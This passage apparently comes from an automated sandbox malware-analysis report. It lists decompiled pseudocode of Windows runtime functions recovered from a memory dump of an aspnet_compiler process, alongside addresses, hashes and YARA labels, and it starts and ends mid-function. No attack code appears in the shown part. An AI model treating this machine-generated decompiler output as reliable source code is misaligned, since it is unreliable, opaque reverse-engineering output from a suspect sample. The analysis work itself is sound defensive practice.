								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018C95D0();
										L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                  0x018bf0d3
                                                  0x018bf0d9
                                                  0x018bf0e0
                                                  0x018bf0e7
                                                  0x018bf0f2
                                                  0x018bf0f4
                                                  0x018bf0f8
                                                  0x018bf100
                                                  0x018bf108
                                                  0x018bf10d
                                                  0x018bf115
                                                  0x018bf116
                                                  0x018bf11f
                                                  0x018bf123
                                                  0x018bf124
                                                  0x018bf12c
                                                  0x018bf130
                                                  0x018bf134
                                                  0x018bf13d
                                                  0x018bf144
                                                  0x018bf14b
                                                  0x018bf152
                                                  0x018fbab0
                                                  0x018fbab0
                                                  0x018bf158
                                                  0x018bf158
                                                  0x018bf15a
                                                  0x018bf160
                                                  0x018bf165
                                                  0x018bf166
                                                  0x018bf16f
                                                  0x018bf173
                                                  0x018fbaa7
                                                  0x018fbaa7
                                                  0x018fbaab
                                                  0x00000000
                                                  0x018bf179
                                                  0x018bf18d
                                                  0x018bf191
                                                  0x018fbaa2
                                                  0x00000000
                                                  0x018bf197
                                                  0x018bf19b
                                                  0x018bf1a2
                                                  0x018bf1a9
                                                  0x018bf1af
                                                  0x018bf1b2
                                                  0x018bf1b6
                                                  0x018bf1b9
                                                  0x018bf1c4
                                                  0x018bf1d8
                                                  0x018bf1df
                                                  0x018bf1e3
                                                  0x018bf1eb
                                                  0x018bf1ee
                                                  0x018bf1f4
                                                  0x018bf20f
                                                  0x018fbab7
                                                  0x018fbabb
                                                  0x018fbacc
                                                  0x018fbad1
                                                  0x018bf215
                                                  0x018bf218
                                                  0x018bf226
                                                  0x018bf22b
                                                  0x00000000
                                                  0x018bf22b
                                                  0x018bf1f6
                                                  0x018bf1f6
                                                  0x018bf1f9
                                                  0x018bf1fb
                                                  0x018bf1fb
                                                  0x018bf1f4
                                                  0x018bf191
                                                  0x018bf173
                                                  0x018bf152
                                                  0x018bf203

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction ID: c671a49f629cbd266ec7ad8c8f2a009447c1d346779d640e01257299eeb6809b
                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction Fuzzy Hash: 6F516A71504715ABD321DF29C840A6BBBF8FF58B14F00892DFA95C7690E7B4EA14CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019505AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E019505AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(L019507DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(L018C9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0194A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0194A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01951293(_t79, _v40, L019507DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(L018A7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0194138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                  0x019505c5
                                                  0x019505ca
                                                  0x019505d3
                                                  0x019506db
                                                  0x019506db
                                                  0x019506dd
                                                  0x019506e3
                                                  0x019506e3
                                                  0x019505dd
                                                  0x019505e7
                                                  0x019505f6
                                                  0x01950600
                                                  0x01950607
                                                  0x01950610
                                                  0x01950615
                                                  0x0195061a
                                                  0x0195061c
                                                  0x0195061e
                                                  0x01950624
                                                  0x01950625
                                                  0x01950627
                                                  0x01950628
                                                  0x01950631
                                                  0x01950640
                                                  0x0195064d
                                                  0x01950654
                                                  0x01950654
                                                  0x01950631
                                                  0x0195066d
                                                  0x01950674
                                                  0x00000000
                                                  0x00000000
                                                  0x01950692
                                                  0x0195069e
                                                  0x019506b0
                                                  0x019506a0
                                                  0x019506a9
                                                  0x019506a9
                                                  0x019506b8
                                                  0x019506d6
                                                  0x019506d6
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction ID: 7975072da5b9a4668e19da1328fc78f849542993f8b73d65f1b30183e2d79cc7
                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction Fuzzy Hash: 7831C2326047466BE750DF28CD85F967BD9FBC4754F184229FE58AB280D670E904C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01903884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E01903884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L018C9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L018A4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L018C9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                  0x01903893
                                                  0x01903896
                                                  0x01903899
                                                  0x0190389f
                                                  0x019038a0
                                                  0x019038a4
                                                  0x019038a9
                                                  0x019038ac
                                                  0x019038ad
                                                  0x019038ae
                                                  0x019038af
                                                  0x019038b1
                                                  0x019038b4
                                                  0x019038bb
                                                  0x019038bc
                                                  0x019038bd
                                                  0x019038c4
                                                  0x019038c8
                                                  0x019038ca
                                                  0x019038ca
                                                  0x019038d5
                                                  0x0190393e
                                                  0x01903940
                                                  0x01903942
                                                  0x01903952
                                                  0x01903954
                                                  0x01903961
                                                  0x01903961
                                                  0x01903967
                                                  0x0190396e
                                                  0x0190396e
                                                  0x01903947
                                                  0x0190394c
                                                  0x00000000
                                                  0x0190394c
                                                  0x019038ea
                                                  0x019038ee
                                                  0x019038f8
                                                  0x019038f9
                                                  0x019038ff
                                                  0x01903900
                                                  0x01903902
                                                  0x01903903
                                                  0x0190390b
                                                  0x0190390f
                                                  0x01903950
                                                  0x00000000
                                                  0x01903950
                                                  0x01903915
                                                  0x0190391d
                                                  0x0190391d
                                                  0x01903922
                                                  0x01903926
                                                  0x00000000
                                                  0x01903928
                                                  0x0190392b
                                                  0x0190392b
                                                  0x01903935
                                                  0x01903937
                                                  0x01903937
                                                  0x00000000
                                                  0x01903935
                                                  0x01903926
                                                  0x019038f0
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 22cf4d630e6123ad521f09eb51e58ee4054b381faf5566e2ecff77092df67246
                                                  • Instruction ID: 3d67c2b9d84b2dec404cc1c973b433d95209f44a5d22d1c3ff8cfaccf7aae64e
                                                  • Opcode Fuzzy Hash: 22cf4d630e6123ad521f09eb51e58ee4054b381faf5566e2ecff77092df67246
                                                  • Instruction Fuzzy Hash: 9B31D432D0051AEFEB16DB5CC945D6BBB78FB40B20F014169EA69A7290D7309F00C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 33%
                                                  			E018BD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x197d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E018A4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L018CB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018C98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018C95D0();
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                  0x018bd29c
                                                  0x018bd2a6
                                                  0x018bd2b1
                                                  0x018bd2b5
                                                  0x018bd2b6
                                                  0x018bd2bc
                                                  0x018bd2bd
                                                  0x018bd2be
                                                  0x018bd2bf
                                                  0x018bd2c2
                                                  0x018bd2c4
                                                  0x018bd2cc
                                                  0x018bd384
                                                  0x018bd34b
                                                  0x018bd34f
                                                  0x018bd350
                                                  0x018bd351
                                                  0x018bd35c
                                                  0x018bd35c
                                                  0x018bd2d6
                                                  0x018bd2da
                                                  0x018bd2e1
                                                  0x018bd361
                                                  0x018bd369
                                                  0x018bd36d
                                                  0x018bd2e3
                                                  0x018bd2e3
                                                  0x018bd2e3
                                                  0x018bd2e5
                                                  0x018bd2ed
                                                  0x018bd2f5
                                                  0x018bd2fa
                                                  0x018bd302
                                                  0x018bd303
                                                  0x018bd30b
                                                  0x018bd30f
                                                  0x018bd313
                                                  0x018bd318
                                                  0x018bd31c
                                                  0x018bd320
                                                  0x018bd379
                                                  0x018bd37d
                                                  0x00000000
                                                  0x00000000
                                                  0x018faffe
                                                  0x018fb001
                                                  0x018fb011
                                                  0x00000000
                                                  0x018bd322
                                                  0x018bd322
                                                  0x018bd330
                                                  0x018bd337
                                                  0x018bd35d
                                                  0x018bd339
                                                  0x018bd33f
                                                  0x018bd38c
                                                  0x018bd38c
                                                  0x018bd33f
                                                  0x018bd349
                                                  0x00000000
                                                  0x018bd349

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 12c43d026ae41ac5c124c1ac3ebd6a3e5732a3695d366eb374fe7738c72cd2fb
                                                  • Instruction ID: 0284c53ff6493fbefd9358afde27a263603b728cd4031442f65f7dcd0c366633
                                                  • Opcode Fuzzy Hash: 12c43d026ae41ac5c124c1ac3ebd6a3e5732a3695d366eb374fe7738c72cd2fb
                                                  • Instruction Fuzzy Hash: 40318171509305AFD311DF68C9C09ABBBE8EB99758F000A2EF594C3312E635DE04CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01891B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E01891B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E018CBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E018CA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E018CA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L018A4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                  0x01891b8f
                                                  0x01891b9a
                                                  0x01891b9c
                                                  0x01891b9e
                                                  0x01891ba3
                                                  0x018e7010
                                                  0x018e7010
                                                  0x00000000
                                                  0x01891ba9
                                                  0x01891ba9
                                                  0x01891bae
                                                  0x00000000
                                                  0x01891bc5
                                                  0x01891bca
                                                  0x01891bcf
                                                  0x01891bd0
                                                  0x01891bd1
                                                  0x01891bd2
                                                  0x01891bd6
                                                  0x01891bdc
                                                  0x01891be0
                                                  0x018e6ffc
                                                  0x018e7000
                                                  0x00000000
                                                  0x018e7006
                                                  0x018e7009
                                                  0x018e7009
                                                  0x01891be6
                                                  0x01891bec
                                                  0x01891c0b
                                                  0x01891c0b
                                                  0x01891c0c
                                                  0x01891c11
                                                  0x01891c12
                                                  0x01891c15
                                                  0x01891c1b
                                                  0x01891c1f
                                                  0x01891c31
                                                  0x01891c33
                                                  0x018e7026
                                                  0x018e7026
                                                  0x01891c21
                                                  0x01891c24
                                                  0x01891c24
                                                  0x01891bee
                                                  0x01891bee
                                                  0x01891bf2
                                                  0x01891c3a
                                                  0x01891bf4
                                                  0x01891bf4
                                                  0x01891c05
                                                  0x01891c05
                                                  0x01891c09
                                                  0x01891c3e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01891c09
                                                  0x01891bec
                                                  0x01891be0
                                                  0x01891bae
                                                  0x01891c2e

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WindowsExcludedProcs
                                                  • API String ID: 0-3583428290
                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction ID: 01c1d7146ef9b1c720530331b5542d0522820410f373c5541238c95dafeac8e4
                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction Fuzzy Hash: AE21F83650415AABDF229A5DC848F5B7BADAF41B68F094425FA05CB200D630DF01D7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01938DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E01938DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1960d50);
				E018DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					L01915720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L018DDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L018DDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E018DD130(_t34, _t39, _t40);
			}





                                                  0x01938df1
                                                  0x01938df1
                                                  0x01938df1
                                                  0x01938df1
                                                  0x01938df1
                                                  0x01938df1
                                                  0x01938df3
                                                  0x01938df8
                                                  0x01938dfd
                                                  0x01938e00
                                                  0x01938e0e
                                                  0x01938e2a
                                                  0x01938e36
                                                  0x01938e38
                                                  0x01938e3c
                                                  0x01938e46
                                                  0x01938e46
                                                  0x01938e36
                                                  0x01938e50
                                                  0x01938e56
                                                  0x01938e59
                                                  0x01938e5c
                                                  0x01938e60
                                                  0x01938e67
                                                  0x01938e6d
                                                  0x01938e73
                                                  0x01938e74
                                                  0x01938eb1
                                                  0x01938ebd

                                                  Strings
                                                  • Critical error detected %lx, xrefs: 01938E21
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Critical error detected %lx
                                                  • API String ID: 0-802127002
                                                  • Opcode ID: ca6f7c520ae7176f18e3236da5f7f290179d1d87ce146181a5289de1623d066a
                                                  • Instruction ID: 06a5f288b107d13cd30d88201f88a13d3cc8aa27c19c138506749da9fb1c133e
                                                  • Opcode Fuzzy Hash: ca6f7c520ae7176f18e3236da5f7f290179d1d87ce146181a5289de1623d066a
                                                  • Instruction Fuzzy Hash: 32117571D44348DADF25EFA88505B9DBBB4BB54315F20421EE12DAB282C3345602CF24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188F900 Relevance: .9, Instructions: 863COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 99%
                                                  			E0188F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
